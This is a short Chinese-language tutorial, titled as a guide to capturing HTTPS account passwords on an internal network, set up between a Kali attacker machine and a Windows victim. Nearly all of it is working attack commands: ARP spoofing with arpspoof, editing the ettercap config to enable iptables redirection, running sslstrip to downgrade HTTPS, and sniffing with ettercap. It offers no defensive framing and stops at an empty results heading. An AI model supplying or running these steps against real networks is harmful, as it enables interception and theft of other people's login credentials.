内网称霸之HTTPS账号密码获取
准备工具
1)KALI LINUX系统IP 10.10.10.131
2)WINDOWS 系统 IP 10.10.10.129
3)Arpspoof 嗅探工具
4)Sslstrip https的链接
5)ettercap抓包工具
步骤:
1、root@kali:~# arpspoof -i eth0 -t 10.10.10.129 10.10.10.2
2、更改Sslstrip 配置文件
vim /etc/ettercap/etter.conf
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
将这两行的注释去掉如下:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3、root@kali:~# sslstrip -a -f -k
4、root@kali:~# ettercap -Tq -i eth0
嗅探结果: